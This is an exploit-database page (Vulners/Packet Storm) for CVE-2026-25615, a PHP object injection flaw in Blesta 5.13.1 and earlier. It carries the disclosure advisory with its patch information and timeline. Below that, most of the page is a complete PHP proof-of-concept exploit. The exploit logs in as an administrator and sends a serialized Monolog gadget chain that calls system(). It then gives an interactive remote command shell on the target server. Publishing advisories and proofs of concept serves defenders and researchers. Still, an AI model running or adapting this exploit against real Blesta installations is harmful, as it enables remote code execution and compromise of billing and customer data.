Vulners
Lucene search
๐ Blesta 5.13.1 Admin Interface PHP Object Injection
๐๏ธย 04 Feb 2026ย 00:00:00Reported byย EgiXTypeย 
ย packetstorm๐ย packetstorm.news๐ย 94ย Views
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
 | CVE-2026-25615 | 3 Feb 202619:18 | โ | attackerkb |
 | CVE-2026-25615 | 3 Feb 202621:29 | โ | circl |
 | Blesta ไปฃ็ ้ฎ้ขๆผๆด | 3 Feb 202600:00 | โ | cnnvd |
 | CVE-2026-25615 | 3 Feb 202619:18 | โ | cve |
 | CVE-2026-25615 | 3 Feb 202619:18 | โ | cvelist |
 | EUVD-2026-5171 | 3 Feb 202619:18 | โ | euvd |
 | CVE-2026-25615 | 3 Feb 202620:15 | โ | nvd |
 | PT-2026-6332 | 3 Feb 202600:00 | โ | ptsecurity |
 | CVE-2026-25615 | 4 Feb 202619:27 | โ | redhatcve |
 | CVE-2026-25615 | 3 Feb 202619:18 | โ | vulnrichment |
10
--------------------------------------------------------------------------------
Blesta <= 5.13.1 (Admin Interface) Multiple PHP Object Injection Vulnerabilities
--------------------------------------------------------------------------------
[-] Software Link:
https://www.blesta.com
[-] Affected Versions:
All versions from 3.0.0 to 5.13.1.
[-] Vulnerabilities Description:
The vulnerabilities exist because user input passed through the "vars"
and "order_info" POST parameters when dispatching the
/app/controllers/admin_clients.php script, and through the
"$group_name" POST parameter when dispatching the
/app/controllers/admin_company_groups.php script, is not properly
sanitized before being used in a call to the unserialize() PHP
function. This can be exploited by malicious administrator users to
inject arbitrary PHP objects into the application scope, allowing them
to perform a variety of attacks, such as executing arbitrary PHP code
(RCE).
[-] Proof of Concept:
https://karmainsecurity.com/pocs/CVE-2026-25615.php
[-] Solution:
Apply the vendor patch or upgrade to version 5.13.2 or later.
[-] Disclosure Timeline:
[19/01/2026] - Vendor notified
[20/01/2026] - Vendor response stating: โthis issue was previously
identified during an internal security reviewโ
[22/01/2026] - CVE identifier requested
[28/01/2026] - Version 5.13.2 released
[31/01/2026] - Version 5.13.3 released to address regressions
introduced in 5.13.2
[03/02/2026] - CVE identifier assigned
[04/02/2026] - Public disclosure
[-] CVE Reference:
The Common Vulnerabilities and Exposures project (cve.org) has
assigned the name CVE-2026-25615 to these vulnerabilities.
[-] Credits:
Vulnerabilities discovered by Egidio Romano.
[-] Other References:
https://www.blesta.com/2026/01/28/security-advisory/
[-] Original Advisory:
https://karmainsecurity.com/KIS-2026-02
--- packet storm attached poc: ---
<?php
/*
--------------------------------------------------------------------------------
Blesta <= 5.13.1 (Admin Interface) Multiple PHP Object Injection Vulnerabilities
--------------------------------------------------------------------------------
author..............: Egidio Romano aka EgiX
mail................: n0b0d13s[at]gmail[dot]com
software link.......: https://www.blesta.com
+-------------------------------------------------------------------------+
| This proof of concept code was written for educational purpose only. |
| Use it at your own risk. Author will be not responsible for any damage. |
+-------------------------------------------------------------------------+
[-] Original Advisory:
https://karmainsecurity.com/KIS-2026-02
*/
set_time_limit(0);
error_reporting(E_ERROR);
print "\n+---------------------------------------------------------------------+";
print "\n| Blesta <= 5.13.1 (makepayment) PHP Object Injection Exploit by EgiX |";
print "\n+---------------------------------------------------------------------+\n";
if (!extension_loaded("curl")) die("\n[-] cURL extension required!\n\n");
if ($argc != 4)
{
print "\nUsage......: php $argv[0] <URL> <Username> <Password>\n";
print "\nExample....: php $argv[0] http://localhost/blesta/ egix password";
print "\nExample....: php $argv[0] https://www.blesta.com/ hacker pwned\n\n";
die();
}
class Monolog_Handler_SyslogUdpHandler
{
protected $socket;
function __construct($x)
{
$this->socket = $x;
}
}
class Monolog_Handler_BufferHandler
{
protected $handler;
protected $bufferSize = -1;
protected $buffer;
protected $level = null;
protected $initialized = true;
protected $bufferLimit = -1;
protected $processors;
function __construct($methods, $command)
{
$this->processors = $methods;
$this->buffer = [$command];
$this->handler = $this;
}
}
function exec_cmd($cmd)
{
global $ch, $url, $token;
$cmd .= "; echo CMDDELIM";
$chain = new Monolog_Handler_SyslogUdpHandler(new Monolog_Handler_BufferHandler(['current', 'system'], [$cmd, 'level' => null]));
$chain = base64_encode(str_replace('_', '\\', serialize($chain)));
curl_setopt($ch, CURLOPT_URL, "{$url}admin/clients/makepayment/1/");
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(["_csrf_token" => $token[1], "vars" => $chain]));
return curl_exec($ch);
}
$url = $argv[1];
$user = $argv[2];
$pwd = $argv[3];
$ch = curl_init();
@unlink("./cookies.txt");
curl_setopt($ch, CURLOPT_URL, "{$url}admin/login/");
curl_setopt($ch, CURLOPT_COOKIEJAR, "./cookies.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "./cookies.txt");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
//curl_setopt($ch, CURLOPT_PROXY, 'http://127.0.0.1:8080');
print "\n[+] Performing login with username '{$user}' and password '{$pwd}'\n";
if (!preg_match('/"_csrf_token" value="([^"]+)/i', curl_exec($ch), $token)) die("[-] CSRF token not found!\n\n");
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(["_csrf_token" => $token[1], "username" => $user, "password" => $pwd]));
if (preg_match('/alert-danger/', curl_exec($ch))) die("[-] Login failed!\n\n");
print "[+] Launching shell\n";
curl_setopt($ch, CURLOPT_URL, "{$url}admin/");
curl_setopt($ch, CURLOPT_POST, false);
if (!preg_match('/"_csrf_token" value="([^"]+)/i', curl_exec($ch), $token)) die("[-] CSRF token not found!\n\n");
while(1)
{
print "\nblesta-shell# ";
if (($cmd = trim(fgets(STDIN))) == "exit") break;
preg_match('/(.*)CMDDELIM/s', exec_cmd($cmd), $m) ? print $m[1] : die("\n[-] Exploit failed!\n\n");
}Data
Build on a solid foundation withย Vulners data
Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data
Api
Power your application withย Vulners API
The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access
App
Assess and manage vulnerabilities withย Vulnersย tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Feb 2026 00:00Current
6.3Medium risk
Vulners AI Score6.3
CVSS 3.17.2
EPSS0.00046
SSVC